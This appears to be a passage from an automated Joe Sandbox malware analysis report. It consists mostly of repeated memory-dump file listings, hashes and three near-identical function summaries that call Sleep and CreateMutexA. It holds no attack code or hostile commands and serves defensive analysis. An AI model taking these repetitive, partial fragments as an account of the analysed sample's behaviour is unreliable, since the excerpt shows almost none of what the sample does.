                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151528684.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151551208.0000000000274000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151604752.0000000000275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151642466.000000000027D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151662777.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151680680.0000000000284000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151699291.0000000000289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151726942.000000000029E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151748641.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151768479.00000000002A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151786460.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151805122.00000000002AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151825913.00000000002B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151852238.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151874517.00000000002B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151901567.00000000002C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151928483.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151956717.00000000002CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151979173.00000000002D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151999880.00000000002D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152022406.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152050708.00000000002E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.00000000002E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152136326.0000000000337000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152160407.0000000000338000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152183065.000000000034C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152203849.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152224214.000000000034E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152248990.0000000000353000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152269027.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152290652.0000000000363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152309411.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                            • Opcode ID: 9e2c7a69156484c2571e22efb11ad95cdddeb1506ff158baa08edb8fca023a23
                                                                                                                                                                                                                                                                            • Instruction ID: e844dfd7aca6da68ca477062602ea871529932c401971347bbcebfcaf8f1e5ef
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e2c7a69156484c2571e22efb11ad95cdddeb1506ff158baa08edb8fca023a23
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65313D317042409FFF18DBBCED897AEB762EB87311F248719E814972D1D77599888712
                                                                                                                                                                                                                                                                            Function 0005A418 Relevance: 3.1, APIs: 2, Instructions: 133sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 343 5a418-5a438 347 5a466-5a482 343->347 348 5a43a-5a446 343->348 351 5a484-5a490 347->351 352 5a4b0-5a4cf 347->352 349 5a45c-5a463 call 6d663 348->349 350 5a448-5a456 348->350 349->347 350->349 353 5a93f-5a949 call 86c6a * 2 350->353 355 5a4a6-5a4ad call 6d663 351->355 356 5a492-5a4a0 351->356 357 5a4d1-5a4dd 352->357 358 5a4fd-5a916 call 680c0 352->358 374 5a94e-5a994 call 86c6a Sleep CreateMutexA 353->374 375 5a949 call 86c6a 353->375 355->352 356->353 356->355 363 5a4f3-5a4fa call 6d663 357->363 364 5a4df-5a4ed 357->364 363->358 364->353 364->363 379 5a9a7-5a9a8 374->379 380 5a996-5a998 374->380 375->374 380->379 381 5a99a-5a9a5 380->381 381->379
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0005A963
                                                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,000B3254), ref: 0005A981
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2150495137.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150171763.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150495137.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150804554.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150890075.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150919180.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151162610.000000000021C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151190617.000000000021E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151289980.000000000024D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151319542.000000000024E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151399260.000000000025E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151427420.000000000025F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151502289.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151528684.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151551208.0000000000274000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151604752.0000000000275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151642466.000000000027D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151662777.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151680680.0000000000284000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151699291.0000000000289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151726942.000000000029E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151748641.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151768479.00000000002A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151786460.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151805122.00000000002AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151825913.00000000002B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151852238.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151874517.00000000002B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151901567.00000000002C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151928483.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151956717.00000000002CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151979173.00000000002D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151999880.00000000002D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152022406.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152050708.00000000002E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.00000000002E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152136326.0000000000337000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152160407.0000000000338000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152183065.000000000034C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152203849.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152224214.000000000034E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152248990.0000000000353000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152269027.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152290652.0000000000363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152309411.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                            • Opcode ID: 54cc10300239d51363466795a7061782e58cdfe232556f39033728c12ea8ce10
                                                                                                                                                                                                                                                                            • Instruction ID: 19c43ba85e2aabfc9405062052d238b6182545f3cc4bc929b28f50a4132b34fd
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 54cc10300239d51363466795a7061782e58cdfe232556f39033728c12ea8ce10
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C316E31B041009BFB18EBB8ED8D7AEB762EFC2315F208719E814973D6D77599888752
                                                                                                                                                                                                                                                                            Function 0005A54D Relevance: 3.1, APIs: 2, Instructions: 132sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 383 5a54d-5a56d 387 5a56f-5a57b 383->387 388 5a59b-5a5b7 383->388 389 5a591-5a598 call 6d663 387->389 390 5a57d-5a58b 387->390 391 5a5e5-5a604 388->391 392 5a5b9-5a5c5 388->392 389->388 390->389 393 5a944-5a949 call 86c6a 390->393 397 5a606-5a612 391->397 398 5a632-5a916 call 680c0 391->398 395 5a5c7-5a5d5 392->395 396 5a5db-5a5e2 call 6d663 392->396 411 5a94e-5a994 call 86c6a Sleep CreateMutexA 393->411 412 5a949 call 86c6a 393->412 395->393 395->396 396->391 403 5a614-5a622 397->403 404 5a628-5a62f call 6d663 397->404 403->393 403->404 404->398 417 5a9a7-5a9a8 411->417 418 5a996-5a998 411->418 412->411 418->417 419 5a99a-5a9a5 418->419 419->417
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0005A963
                                                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,000B3254), ref: 0005A981
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2150495137.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150171763.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150495137.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150804554.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150890075.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150919180.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151162610.000000000021C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151190617.000000000021E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151289980.000000000024D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151319542.000000000024E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151399260.000000000025E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151427420.000000000025F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151502289.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151528684.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151551208.0000000000274000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151604752.0000000000275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151642466.000000000027D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151662777.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151680680.0000000000284000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151699291.0000000000289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151726942.000000000029E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151748641.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151768479.00000000002A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151786460.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151805122.00000000002AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151825913.00000000002B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151852238.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151874517.00000000002B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151901567.00000000002C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151928483.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151956717.00000000002CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151979173.00000000002D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151999880.00000000002D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152022406.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152050708.00000000002E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.00000000002E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152136326.0000000000337000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152160407.0000000000338000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152183065.000000000034C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152203849.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152224214.000000000034E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152248990.0000000000353000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152269027.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152290652.0000000000363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152309411.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                            • Opcode ID: 5e3d81edeee922cb5cd7a293cbd062edfe18095ff3cd6be3167a4342fda53910
                                                                                                                                                                                                                                                                            • Instruction ID: cb0bc77ebb10b140558ffe3080654d6c38ced09fd20d1adfa4449e021d8a27da
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e3d81edeee922cb5cd7a293cbd062edfe18095ff3cd6be3167a4342fda53910
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE314C317041048BFB18DB78ED89BAEB7A2EF86315F248719E8149B2D2D73599888712
                                                                                                                                                                                                                                                                            Function 0005A682 Relevance: 3.1, APIs: 2, Instructions: 131sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 421 5a682-5a6a2 425 5a6a4-5a6b0 421->425 426 5a6d0-5a6ec 421->426 427 5a6c6-5a6cd call 6d663 425->427 428 5a6b2-5a6c0 425->428 429 5a6ee-5a6fa 426->429 430 5a71a-5a739 426->430 427->426 428->427 431 5a949 428->431 433 5a710-5a717 call 6d663 429->433 434 5a6fc-5a70a 429->434 435 5a767-5a916 call 680c0 430->435 436 5a73b-5a747 430->436 439 5a94e-5a994 call 86c6a Sleep CreateMutexA 431->439 440 5a949 call 86c6a 431->440 433->430 434->431 434->433 442 5a75d-5a764 call 6d663 436->442 443 5a749-5a757 436->443 453 5a9a7-5a9a8 439->453 454 5a996-5a998 439->454 440->439 442->435 443->431 443->442 454->453 455 5a99a-5a9a5 454->455 455->453
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0005A963
                                                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,000B3254), ref: 0005A981
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2150495137.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150171763.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150495137.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150804554.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150890075.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150919180.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151162610.000000000021C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151190617.000000000021E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151289980.000000000024D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151319542.000000000024E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151399260.000000000025E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151427420.000000000025F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151502289.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151528684.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151551208.0000000000274000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151604752.0000000000275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151642466.000000000027D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151662777.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151680680.0000000000284000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151699291.0000000000289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151726942.000000000029E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151748641.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151768479.00000000002A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151786460.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151805122.00000000002AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151825913.00000000002B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151852238.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151874517.00000000002B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151901567.00000000002C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151928483.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151956717.00000000002CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151979173.00000000002D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151999880.00000000002D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152022406.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
